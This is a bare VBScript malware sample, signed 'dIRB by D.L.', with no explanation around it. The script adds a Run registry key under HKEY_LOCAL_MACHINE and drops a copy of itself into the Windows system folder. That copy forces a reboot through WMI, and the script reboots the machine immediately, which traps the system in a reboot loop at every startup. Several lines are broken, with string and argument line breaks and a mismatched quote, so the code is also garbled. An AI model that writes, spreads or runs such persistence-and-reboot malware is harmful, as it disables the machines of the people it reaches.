

```
set FSobj=CreateObject("Scripting.FileSystemObject")
set sysDir = FSobj.GetSpecialFolder(1)
createRegKey
"HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\dIRB",sysDir&
\dIRB.vbs"
sub createRegKey(regKey,regVal)
set regEdit = CreateObject("WScript.Shell")
regEdit.RegWrite regKey,regVal
end sub
set generateCopy=FSobj.CreateTextFile(sysDir+"\dIRB.vbs")
generateCopy.close
set newFile = FSobj.OpenTextFile(WScript.Scriptfullname,1)
setFile()
fixedCode=replace(fileData,chr(94),"""")
set procreateCopy=FSobj.OpenTextFile(sysDir+"\dIRB.vbs",2)
procreateCopy.write fixedCode
procreateCopy.close
rebootSystem()
function setFile()
fileData="rem - ^dIRB^ by D.L." &vbCrLf& _
"strComputer = ^.^ &vbCrLf& _
"Set objWMIService = GetObject(^winmgmts:^_ &vbCrLf& _
"& ^{impersonationLevel=impersonate,(Shutdown)}!\\^ & strComputer & ^\root\cimv2^)"
&vbCrLf& _
"Set colOperatingSystems = objWMIService.ExecQuery _ &vbCrLf& _
"(^Select * from Win32_OperatingSystem^)" &vbCrLf& _
"For Each objOperatingSystem in colOperatingSystems" &vbCrLf& _
"ObjOperatingSystem.Reboot()" &vbCrLf& _
"Next"
end function
function rebootSystem()
strComputer = "."
Set objWMIService = GetObject("winmgmts:"
& "{impersonationLevel=impersonate,(Shutdown)}!\\^ & strComputer & "\root\cimv2")
Set colOperatingSystems = objWMIService.ExecQuery _
("Select * from Win32_OperatingSystem")
For Each objOperatingSystem in colOperatingSystems
ObjOperatingSystem.Reboot()
Next
end function
```